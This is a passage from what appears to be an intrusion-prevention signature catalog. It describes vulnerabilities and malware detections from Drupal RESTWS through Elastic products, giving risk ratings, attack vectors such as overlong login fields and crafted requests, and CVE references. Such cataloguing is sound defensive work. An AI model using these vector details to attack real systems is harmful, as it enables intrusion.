Risk: Moderate
First detected in: sgpkg-ips-780-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Drupal
Type: Malfunction
Description: The callback function in the Drupal RESTWS module can be exploited by sending a crafted HTTP request. A succesful exploit allows an attacker to run arbitrary code on the target.
Situation: HTTP_CSU-Drupal-Restws-Module-Page-Callback-Remote-Code-Execution
Back to top

Dsielercha-Trojan

About this vulnerability: Dsielercha Trojan
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Traffic of the Dsielercha trojan that infects Windows-based systems.
Situation: HTTP_CRL-Dsielercha-Trojan
Back to top

Dup-Scout-Enterprise-Login-Buffer-Overflow

About this vulnerability: A Dup Scout Enterprise Login Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Dup Scout
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Dup Scout Enterprise, version 10.0.18, which allows remote attackers to execute arbitrary code via the web interface during login.
Situation: HTTP_CRL-Dup-Scout-Enterprise-Login-Buffer-Overflow
Back to top

Dynamicdesktopmedia

About this vulnerability: DynamicDesktopMedia
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: DynamicDesktopMedia
Type: Misconfiguration
Description: DynamicDesktopMedia is a Trojan adware that generates pop-up ads. It is considered a potentially unwanted program.
Situation: HTTP_CSU-Dynamicdesktopmedia
Back to top

E-Book-Systems-FlipViewer-ActiveX-Control-Multiple-Methods-Buffer-Overflow

About this vulnerability: A vulnerability in E-Book Systems FlipViewer ActiveX Control
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1729-5242
Platform: Windows
Software: E-Book Systems FlipViewer
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the E-Book Systems ActiveX control. The vulnerability is due to a lack of input validation when handling arguments of various methods. A remote attacker can exploit this vulnerability by enticing the target user to open a specially crafted web page. Successful exploitation allows arbitrary code injection and execution with the privileges of the currently logged in user.
Situation: HTTP_SS-E-Book-Systems-FlipViewer-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-2919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2919
BID-24328
http://www.securityfocus.com/bid/24328
OSVDB-37042
http://www.osvdb.org/37042
Back to top

Easy-Chat-Server-User-Registeration-Buffer-Overflow

About this vulnerability: An Easy Chat Server User Registeration Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1016-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Easy Chat Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Easy Chat Server, versions 2.0 to 3.0, which allows remote attackers to execute remote code through the UserName parameter in register.php.
Situation: HTTP_CRL-Easy-Chat-Server-User-Registeration-Buffer-Overflow
Back to top

Easy-Chat-Server-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in Easy Chat Server 1.2 and 2.2
Risk: Moderate
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Easy Chat Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Easy Chat Server 1.2 and 2.2, via a lone username parameter, which allows a remote attacker to cause a denial of service condition, and possibly execute arbitrary code.
Situation: HTTP_CRL-Easy-Chat-Server-Username-Buffer-Overflow
References:
CVE-2004-2466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2466
BID-25328
http://www.securityfocus.com/bid/25328
OSVDB-7416
http://www.osvdb.org/7416
Back to top

Easy-File-Sharing-FTP-Server-BOF

About this vulnerability: Buffer overflow in Easy File Sharing FTP Server
Risk: High
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Easy File Sharing FTP Server
Type: Buffer Overflow
Description: A stack based buffer overflow in Easy File Sharing FTP Server which allows a remote attacker to execute arbitrary code via a long PASS command argument.
Situation: Shared_FTP-Long-Password
References:
CVE-2006-3952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3952
BID-19243
http://www.securityfocus.com/bid/19243
OSVDB-27646
http://www.osvdb.org/27646
Back to top

Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow

About this vulnerability: An Easy File Sharing HTTP Server POST Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Easy File Sharing HTTP Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Easy File Sharing HTTP Server, version 7.2, which allows remote attackers to execute arbitrary code via a malicious POST to /sendemail.ghp.
Situation: HTTP_CS-Easy-File-Sharing-HTTP-Server-POST-Buffer-Overflow
Back to top

Easy-Homepage-Edit.cgi-Vulnerability

About this vulnerability: Easy HomePage Edit.cgi Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Easy HomePage
Type: Malfunction
Description: There exists a vulnerability in Easy HomePage that allows a remote attacker to modify home pages of other users.
Situation: HTTP_CSU-Easy-Homepage-Edit.cgi-Vulnerability
References:
CVE-2002-1427
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1427
BID-5340
http://www.securityfocus.com/bid/5340
Back to top

Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Eaton HmiSoft VU3
Risk: Moderate
First detected in: sgpkg-ips-1271-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton HmiSoft VU3
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Eaton HmiSoft. The vulnerability is due to improper handling of the GIFFILE element in VU3 files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted VU3 file. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the HMiSoft process.
Situation: File-Binary_Eaton-Hmisoft-Vu3-Giffile-Stack-Buffer-Overflow
References:
CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639
Back to top

Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities

About this vulnerability: A vulnerability in Eaton HmiSoft VU3
Risk: Moderate
First detected in: sgpkg-ips-1263-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton HmiSoft VU3
Type: Buffer Overflow
Description: Multiple vulnerabilities in Eaton HmiSoft VU3 allow an attacker to execute arbitrary code on the target system.
Situation: File-Binary_Eaton-Hmisoft-Vu3-Multiple-Vulnerabilities
References:
CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639
Back to top

Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Eaton HMiSoft VU3
Risk: High
First detected in: sgpkg-ips-1268-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Eaton HmiSoft VU3
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Eaton HMiSoft VU3, versions 3.00.23 and before, which allows remote attackers to execute arbitrary code due to the improper handling of the wMailBlindCopyToLen element in VU3 files.
Situation: File-Binary_Eaton-Hmisoft-Vu3-wMailBlindCopyToLen-Stack-Buffer-Overflow
References:
CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639
Back to top

Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Eaton HmiSoft VU3
Risk: Moderate
First detected in: sgpkg-ips-1272-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton HmiSoft VU3
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability has been reported in Eaton HmiSoft. The vulnerability is due to improper handling of the wMailContentLen element in VU3 files. A remote attacker could exploit this vulnerability by enticing a user to open a crafted VU3 file. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the HMiSoft process.
Situation: File-Binary_Eaton-Hmisoft-Vu3-Wmailcontentlen-Stack-Buffer-Overflow
References:
CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639
Back to top

Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Eaton HMiSoft VU3
Risk: High
First detected in: sgpkg-ips-1270-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Eaton HmiSoft VU3
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in Eaton HMiSoft VU3, versions 3.00.23 and before, which allows remote attackers to execute arbitrary code due to the improper handling of the wMessageLen element in VU3 files.
Situation: File-Binary_Eaton-Hmisoft-Vu3-wMessageLen-Stack-Buffer-Overflow
References:
CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639
Back to top

Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Eaton HmiSoft VU3
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton HmiSoft VU3
Type: Input Validation
Description: Improper handling of the wTextLen element in VU3 files causes a buffer overflow vulnerability in Eaton HmiSoft VU3. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.
Situation: File-Binary_Eaton-Hmisoft-Vu3-Wtextlen-Stack-Buffer-Overflow
References:
CVE-2020-10639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10639
Back to top

Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Eaton Intelligent Power Manager
Risk: Moderate
First detected in: sgpkg-ips-1470-5242
Last changed: sgpkg-ips-1470-5242
Platform: Generic
Software: Eaton Intelligent Power Manager
Type: Input Validation
Description: Missing input validation causes a cross-site scripting injection vulnerability in Eaton Intelligent Power Manager. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Eaton-Intelligent-Power-Management-CVE-2021-23282-Stored-Cross-Site-Scripting
References:
CVE-2021-23282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23282
Back to top

Eaton-Intelligent-Power-Manager-Savedriverdata-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Eaton Intelligent Power Manager
Risk: Moderate
First detected in: sgpkg-ips-1344-5242
Last changed: sgpkg-ips-1344-5242
Platform: Generic
Software: Eaton Intelligent Power Manager
Type: Directory Traversal
Description: Insufficient input validation in meta_driver_srv.js causes an arbitrary file deletion vulnerability in Eaton Intelligent Power Manager. A successful exploit allows an attacker to delete files on the target system.
Situation: HTTP_CRL-Eaton-Intelligent-Power-Management-Meta_Driver_Srv-Savedriverdata-Arbitrary-File-Deletion
References:
CVE-2021-23279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23279
Back to top

Eaton-Intelligent-Power-Manager-System-Command-Injection

About this vulnerability: A vulnerability in Eaton Intelligent Power Manager
Risk: Moderate
First detected in: sgpkg-ips-1253-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton Intelligent Power Manager
Type: Input Validation
Description: Insufficient validation of user-supplied strings in requests handled by system_srv.js causes a command injection vulnerability in Eaton Intelligent Power Manager. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CS-Eaton-Intelligent-Power-Manager-System-Command-Injection
References:
CVE-2020-6651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6651
Back to top

Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion

About this vulnerability: A vulnerability in Eaton Intelligent Power Manager
Risk: Moderate
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Platform: Generic
Software: Eaton Intelligent Power Manager
Type: Directory Traversal
Description: Insufficient input validation in maps_srv.js and node_upgrade_srv.js results in an arbitrary file deletion vulnerabilities in Eaton IPM. A successful exploit allows an attacker to delete arbitrary files on the target system.
Situation: HTTP_CRL-Eaton-IPM-Removebackground-Removefirmware-Arbitrary-File-Deletion
References:
CVE-2021-23278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23278
Back to top

Eaton-Network-Shutdown-Module-Remote-Code-Execution

About this vulnerability: A vulnerability in Eaton Network Shutdown Module
Risk: High
First detected in: sgpkg-ips-608-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton Network Shutdown Module
Type: Malfunction
Description: There is a PHP code injection vulnerability in Eaton Network Shutdown Module which allows remote attackers to execute arbritrary code.
Situation: HTTP_CRL-Eaton-Network-Shutdown-Module-Remote-Code-Execution
References:
OSVDB-83199
http://www.osvdb.org/83199
Back to top

Eaton-Shutdown-Module-DoS

About this vulnerability: A vulnerability in Eaton Network Shutdown Module
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton Network Shutdown Module
Type: Malfunction
Description: There is a denial of service vulnerability in Eaton Network Shutdown Module
Situation: HTTP_CSU-Eaton-Shutdown-Module-DoS
Back to top

Eaton-VURemote-DoS

About this vulnerability: A vulnerability in Eaton VURemote
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eaton VURemote
Type: Malfunction
Description: There is a denial of service vulnerability in Eaton VURemote
Situation: Generic_SS-Eaton-VURemote-DoS
Back to top

Ebates-Moneymaker

About this vulnerability: Ebates MoneyMaker
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ebates MoneyMaker
Type: Misconfiguration
Description: Ebates MoneyMaker is an adware that will generate pop-up ads and can perform other unwanted or harmful actions, such as installing or uninstalling other software.
Situation: HTTP_CSU-Ebates-Moneymaker
HTTP_CSH-Ebates-Moneymaker
Back to top

Ebcrypt-ActiveX-Arbitrary-File-Overwrite

About this vulnerability: Ebcrypt ActiveX Arbitrary File Overwrite Vulnerability.
Risk: High
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: ebCrypt
Type: Directory Traversal
Description: A vulnerability exists in ebCrypt ActiveX 2.0 which allows remote attackers to create or overwrite arbitrary files via a full pathneame in the argument to the SaveToFile method.
Situation: File-Text_Ebcrypt-ActiveX-Arbitrary-File-Overwrite
References:
CVE-2007-5110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5110
BID-25787
http://www.securityfocus.com/bid/25787
OSVDB-37736
http://www.osvdb.org/37736
Back to top

Ebury-SSH-Backdoor-Activity

About this vulnerability: Ebury SSH Rootkit backdoor detected
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Linux
Software: Ebury SSH Rootkit
Type: Input Validation
Description: Ebury SSH version string has been detected. The victim host has likely been compromised. Ebury is a SSH rootkit/backdoor trojan for Linux and Unix-style operating systems (like FreeBSD or Solaris).
Situation: SSH_Ebury-SSH-Client-Backdoor-Activity
Generic_CS-Ebury-SSH-Backdoor-Activity
Back to top

Ecava-IntegraXOR-DoS-CVE-2014-0753

About this vulnerability: A vulnerability in Ecava IntegraXor
Risk: Moderate
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IntegraXOR
Type: Malfunction
Description: There is a denial of service vulnerability in Ecava IntegraXor
Situation: HTTP_CSU-Ecava-IntegraXOR-CVE-2014-0753
References:
CVE-2014-0753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0753
OSVDB-102171
http://www.osvdb.org/102171
Back to top

Ecava-IntegraXOR-SCADA-Information-Leak

About this vulnerability: A vulnerability in Ecava IntegraXOR
Risk: High
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: IntegraXOR
Type: Input Validation
Description: There is an information disclosure vulnerability in Ecava IntegraXOR.
Situation: HTTP_CRL-Ecava-IntegraXOR-SCADA-Information-Leak
Back to top

Echo-Request-Modem-Hangup

About this vulnerability: ICMP Echo request (type 8, code 0) with modem hangup code
Risk: Low
First detected in: sgpkg-ips-561-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: An ICMP Echo request (type 8, code 0) with modem hangup code has been detected. Some legacy dial-up systems do not implement proper guard time protection, making them vulnerable for remote modem command execution.
Situation: ICMP_Echo-Request-Modem-Hangup
References:
CVE-1999-1228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1228
Back to top

Eclipse-Equinoxe-OSGi-Console-Command-Execution

About this vulnerability: An Eclipse Equinoxe OSGi Console Command Execution vulnerability
Risk: High
First detected in: sgpkg-ips-1071-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux; Windows
Software: Eclipse Equinoxe OSGi
Type: Input Validation
Description: A vulnerability in Eclipse Equinoxe OSGi which allows remote attackers to execute arbitrary commands on a remote system via the fork command.
Situation: Telnet_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution
Generic_CS-Eclipse-Equinoxe-OSGi-Console-Command-Execution
Back to top

Eclipse-Foundation-Jetty-Web-Server-Httpparser-Remote-Information-Disclosure

About this vulnerability: A vulnerability in Eclipse Foundation Jetty Web Server
Risk: High
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Jetty Web Server
Type: Malfunction
Description: An information disclosure vulnerability exists in Eclipse Foundation Jetty Web Server. The vulnerability is due to improper parsing of HTTP requests that can lead to information disclosure via HTTP responses from the server. A remote unauthenticated attacker can exploit this vulnerability by sending HTTP requests containing illegal characters within multiple fields to the vulnerable server. Successful exploitation of the vulnerability will result in disclosing information from the previous requests sent to the server.
Situation: HTTP_CSH-Invalid-Ascii-In-HTTP-Header
References:
CVE-2015-2080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
BID-72768
http://www.securityfocus.com/bid/72768
OSVDB-118744
http://www.osvdb.org/118744
Back to top

Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650

About this vulnerability: A vulnerability in Eclipse Mosquitto
Risk: Moderate
First detected in: sgpkg-ips-1869-5242
Last changed: sgpkg-ips-1869-5242
Platform: Generic
Software: Eclipse Foundation Mosquitto
Type: Malfunction
Description: A bypass for pattern based access control lists exists in Mosquitto versions before 1.4.12. An attacker could exploit this to access MQTT topics by using a crafted username or client id.
Situation: Generic_CS-Eclipse-Mosquitto-ACL-Bypass-CVE-2017-7650
References:
CVE-2017-7650
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7650
Back to top

Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow

About this vulnerability: A vulnerability in Eclipse Foundation Mosquitto
Risk: Moderate
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Eclipse Foundation Mosquitto
Type: Input Validation
Description: There exists a stack overflow vulnerability in Eclipse Mosquitto. Successful exploitation could lead in denial of service conditions on the target server.
Situation: Generic_CS-Eclipse-Mosquitto-MQTT-Subscribe-Topic-Stack-Overflow
References:
CVE-2019-11779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11779
Back to top

ed2k-Peer-To-Peer-Network-Usage

About this vulnerability: ED2K peer-to-peer network usage
Risk: Moderate
First detected in: sgpkg-ips-21-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic P2P
Type: Peer-to-Peer
Description: Ed2k is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors. Popular clients include eDonkey2000 and eMule.
Situation: P2P-TCP_ed2k-Connect-To-Server
P2P-TCP_ed2k-Connect-To-Peer
Back to top

Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316

About this vulnerability: A vulnerability in Edimax IC-7100 IP cameras
Risk: High
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: Edimax IP Camera
Type: Input Validation
Description: An OS command injection vulnerability in Edimax IC-7100 IP cameras allows an attacker to execute arbitrary commands via a crafted HTTP request.
Situation: HTTP_CRL-Edimax-IC-7100-IP-Camera-OS-Command-Injection-CVE-2025-1316
References:
CVE-2025-1316
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1316
Back to top

EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method

About this vulnerability: Unsafe method in EDraw Office ActiveX Component
Risk: Low
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EDraw Office Viewer
Type: Malfunction
Description: There is an unsafe method exposed in the EDraw Office Viewer ActiveX component. It is possible to delete files from the current user by exploiting this vulnerability.
Situation: HTTP_SS-EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
File-Text_EDraw-Office-Viewer-ActiveX-Component-Unsafe-Method
References:
CVE-2007-3168
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3168
BID-24230
http://www.securityfocus.com/bid/24230
OSVDB-36044
http://www.osvdb.org/36044
Back to top

EDraw-Office-Viewer-OpenWebFile-Arbitrary-Program-Execution

About this vulnerability: A vulnerability in EDraw Office Viewer ActiveX control
Risk: High
First detected in: sgpkg-ips-202-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: EDraw Office Viewer
Type: Input Validation
Description: There is an arbitrary program download and execution vulnerability in the EDraw Office Viewer ActiveX control. The design of the OpenWebFile() method is insecure, allowing the control to download and execute arbitrary executables. Remote attackers could exploit this vulnerability by persuading a target user to visit a specially crafted web page. An attack targeting this vulnerability can result in the download and execution of an arbitrary executable program of the attacker's choice. Any downloaded code is executed in the security context of the currently logged in user.
Situation: HTTP_SS-EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call
File-Text_EDraw-Office-Viewer-ActiveX-Control-Vulnerable-OpenWebFile-Method-Call
References:
BID-33242
http://www.securityfocus.com/bid/33242
Back to top

EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169

About this vulnerability: A vulnerability in EDraw PDF Viewer
Risk: Moderate
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Platform: Generic
Software: EDraw PDF Viewer
Type: Malfunction
Description: An insecure ActiveX method in EDraw PDF Viewer versions before 3.2.0.126 can be leveraged for remote code execution via a crafted HTML document.
Situation: File-Text_EDraw-PDF-Viewer-Insecure-ActiveX-Method-CVE-2009-2169
References:
CVE-2009-2169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2169
Back to top

EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow

About this vulnerability: An EFS Software Easy File Management Web Server UserID Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EFS Software Easy File Management Web Server
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Easy File Management Web Server which allows remote attackers to execute arbitrary code by sending crafted HTTP requests to the vulnerable server, due to a boundary error when handling UserID cookies.
Situation: HTTP_CSH-EFS-Software-Easy-File-Management-Web-Server-Userid-Buffer-Overflow
Back to top

EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in EFS Software Easy File Sharing Web Server
Risk: Moderate
First detected in: sgpkg-ips-944-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EFS Software Easy File Sharing Web Server
Type: Input Validation
Description: There exists a stack buffer overflow in the EFS Software Easy File Sharing Web Server. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.
Situation: HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-sendemail.ghp-Stack-Buffer-Overflow
Back to top

EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow

About this vulnerability: A vulnerability in EFS Software Easy File Sharing Web Server
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EFS Software Easy File Sharing Web Server
Type: Malfunction
Description: There is a buffer overflow vulnerability in EFS Software Easy File Sharing Web Server that can be exploited by sending an overly long USERID parameter to the vulnerable server. Successful exploitation could lead to remote code execution.
Situation: HTTP_CRL-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Userid-Buffer-Overflow
References:
CVE-2014-3791
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3791
BID-67406
http://www.securityfocus.com/bid/67406
OSVDB-106965
http://www.osvdb.org/106965
Back to top

EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in EFS Software Easy File Sharing Web Server
Risk: High
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: EFS Software Easy File Sharing Web Server
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in EFS Software Easy File Sharing Web Server. A remote, unauthenticated attacker could use this to execute arbitrary code under the security context of the user.
Situation: HTTP_CSH-EFS-Software-Easy-File-Sharing-Web-Server-Vfolder.ghp-Stack-Buffer-Overflow
Back to top

EICAR-AntiVirus-Test-File

About this vulnerability: EICAR antivirus detection test file
Risk: Low
First detected in: sgpkg-ips-127-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Any Software
Type: Malfunction
Description: The EICAR antivirus detection test file is a harmless file that is used to test reporting and alerting functions of antivirus products.
Situation: Shared_EICAR-AntiVirus-Test-File
E-Mail_BS-EICAR-AntiVirus-Test-File
HTTP_SS-EICAR-AntiVirus-Test-File
File-OLE_EICAR-AntiVirus-Test
File-Flash_EICAR-AntiVirus-Test
File-PDF_EICAR-AntiVirus-Test
File-Binary_EICAR-AntiVirus-Test
HTTP_SHS-EICAR-AntiVirus-Test-File
File-Text_EICAR-AntiVirus-Test-File
File-Text_EICAR-AntiVirus-Test2
File-JPEG_EICAR-AntiVirus-Test
File-PNG_EICAR-AntiVirus-Test
File-GIF_EICAR-AntiVirus-Test
File-RTF_EICAR-AntiVirus-Test
File-RIFF_EICAR-AntiVirus-Test
File-TextId_EICAR-AntiVirus-Test
File-MPEG_EICAR-AntiVirus-Test
File-Zip_EICAR-AntiVirus-Test
File-Exe_EICAR-AntiVirus-Test
Back to top

eIQnetworks-ESA-Buffer-Overflow

About this vulnerability: An eIQnetworks ESA Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-734-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: eIQNetworks ESA
Type: Buffer Overflow
Description: A buffer overflow vulnerability in eIQnetworks ESA, versions before 2.5.0, which allows remote attackers to execute arbitrary code via a long DELETEDEVICE and LICMGR_ADDLICENSE commands.
Situation: Generic_CS-eIQnetworks-ESA-Buffer-Overflow
References:
CVE-2006-3838
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3838
BID-19163
http://www.securityfocus.com/bid/19163
OSVDB-27526
http://www.osvdb.org/27526
Back to top

Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection

About this vulnerability: An Eir D1000 Wireless Router WAN Side Remote Command Injection vulnerability
Risk: High
First detected in: sgpkg-ips-941-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: A code injection vulnerability in Eir D1000 Wireless Routers that allow remote attackers access to the web admin interface from the WAN side of the modem by using crafted TR-064 commands.
Situation: HTTP_CS-Eir-D1000-Wireless-Router-WAN-Side-Remote-Command-Injection
Back to top

Ekeoil-Malware-C2-Traffic

About this vulnerability: Ekeoil malware C2 traffic was detected
Risk: High
First detected in: sgpkg-ips-1131-5242
Last changed: sgpkg-ips-1758-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Ekeoil is a malicious program with information exfiltration capabilities.
Situation: HTTP_CRL-Ekeoil-Malware-C2-Traffic
HTTP_CSH-Ekeoil-Malware-C2-Traffic
Back to top

Ektron-CMS-XSLT-Transform-Remote-Code-Execution

About this vulnerability: An Ektron CMS XSLT Transform Remote Code Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2003 SP2
Software: Ektron CMS
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Ektron CMS, version 8.02 (before SP5), which allows remote attackers to execute arbitrary code with NETWORK SERVICE privileges.
Situation: HTTP_CRL-Ektron-CMS-XSLT-Transform-Remote-Code-Execution
References:
CVE-2012-5357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5357
BID-56816
http://www.securityfocus.com/bid/56816
OSVDB-88107
http://www.osvdb.org/88107
Back to top

Elastic-ElasticSearch-Snapshot-API-Directory-Traversal

About this vulnerability: A vulnerability in Elastic Elasticsearch
Risk: Moderate
First detected in: sgpkg-ips-990-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: ElasticSearch
Type: Directory Traversal
Description: Insufficient validation of the path in a snapshot request causes a directory traversal vulnerability in ElasticSearch. A successful exploit allows arbitrary file contents to be accessed remotely without authentication.
Situation: HTTP_CSU-Elastic-ElasticSearch-Snapshot-API-Directory-Traversal
References:
CVE-2015-5531
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5531
Back to top

Elastic-Kibana-Server.js-Local-File-Inclusion

About this vulnerability: A vulnerability in Elastic Kibana
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
